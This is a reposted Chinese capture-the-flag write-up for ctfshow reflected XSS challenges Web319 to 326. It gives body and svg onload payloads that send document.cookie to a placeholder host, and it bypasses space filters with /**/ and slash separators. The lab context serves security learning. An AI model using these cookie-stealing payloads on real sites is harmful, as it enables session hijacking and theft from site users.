欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 高考 > ctfshow(319->326)--XSS漏洞--反射型XSS

ctfshow(319->326)--XSS漏洞--反射型XSS

2025/2/24 19:34:35 来源:https://blog.csdn.net/m0_56019217/article/details/143636212  浏览:    关键词:ctfshow(319->326)--XSS漏洞--反射型XSS

Web319

在这里插入图片描述

思路

先测试过滤,发现过滤了script、img,没有过滤body,svg
payload:

<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/><svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

得到flag.

Web320

先测试过滤,发现过滤了script、img,没有过滤body,svg
输入payload:

<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/><svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

发现payload被过滤。
测试之后发现是空格被过滤
空格使用 /**/ 或者 / 绕过。

<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/><body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

得到flag.

Web321-326

使用与上一题同样的payload都可以得到flag.

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词